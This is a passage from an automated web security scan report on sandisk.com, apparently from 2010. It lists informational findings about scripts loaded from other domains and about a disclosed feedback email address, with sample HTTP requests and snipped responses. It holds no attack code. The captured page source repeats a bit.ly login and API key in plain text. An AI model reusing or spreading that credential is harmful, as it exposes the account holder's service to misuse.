Content-Length: 32052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk ImageMate.. All-in-One USB 2.0 Reader

           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-189-A20&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.182. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31173
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk ImageMate.. Multi-Card USB 2.0 Reader
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDDR-199-A20 &nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.183. http://www.sandisk.com/products/readers-accessories/sandisk®-mobilemate?-duo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk..-mobilemate...-duo

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/readers-accessories/sandisk..-mobilemate...-duo HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:43:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.184. http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53484
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<!-- Start Product Layout -->
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-008GK-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GI-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GW-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GK-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GB-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-004GR-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
to play preloaded microSDHC... cards**. slotRadio... and slotMusic cards** are preloaded with tunes ready to pop into the player...s memory card slot. Rock on with a 15-hour battery life....
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMX18R-002GK-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.185. http://www.sandisk.com/products/slotradioproducts/sansaplayers-cards/card-vh1-classic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/slotradioproducts/sansaplayers-cards/card-vh1-classic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/slotradioproducts/sansaplayers-cards/card-vh1-classic HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44363
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerLeft" style="position: relative;">

   <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</p>
                       <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSR-11372-A57&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
</a> <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU= SDSR-11372-A57&nRGID=2519" type="text/javascript"> </script>
...[SNIP]...

2.186. http://www.sandisk.com/sandisk-rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /sandisk-rss

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sandisk-rss HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14059
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.187. http://www.sandisk.com/sandisk-rss.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /sandisk-rss.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sandisk-rss.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14064
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.188. http://www.sandisk.com/sandisk-support/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /sandisk-support/contact-us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sandisk-support/contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/contact-us
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28136
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="contentRight">

   
   <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.189. http://www.sandisk.com/sandisk-support/driver-download-wizard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /sandisk-support/driver-download-wizard

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sandisk-support/driver-download-wizard HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.190. http://www.sandisk.com/sandisk-support/where-to-buy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /sandisk-support/where-to-buy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sandisk-support/where-to-buy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15284
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.191. http://www.sandisk.com/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /sitemap

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sitemap HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21487
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

3. Email addresses disclosed  previous  next
There are 191 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


3.1. http://www.sandisk.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Accept: */*
Referer: http://metricstream.com/html/customers.htm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sandisk.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmb=1.4.10.1289949765; __utmc=1; __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28444
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.2. http://www.sandisk.com/PlayListXML/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /PlayListXML/

Issue detail

The following email address was disclosed in the response:

Request

GET /PlayListXML/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.3. http://www.sandisk.com/SanDisk/US-eStore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/US-eStore

Issue detail

The following email address was disclosed in the response:

Request

GET /SanDisk/US-eStore HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.4. http://www.sandisk.com/SanDisk/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/facebook

Issue detail

The following email address was disclosed in the response:

Request

GET /SanDisk/facebook HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.5. http://www.sandisk.com/SanDisk/linkedin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/linkedin

Issue detail

The following email address was disclosed in the response:

Request

GET /SanDisk/linkedin HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.6. http://www.sandisk.com/SanDisk/rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/rss

Issue detail

The following email address was disclosed in the response:

Request

GET /SanDisk/rss HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.7. http://www.sandisk.com/SanDisk/twitter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/twitter

Issue detail

The following email address was disclosed in the response:

Request

GET /SanDisk/twitter HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
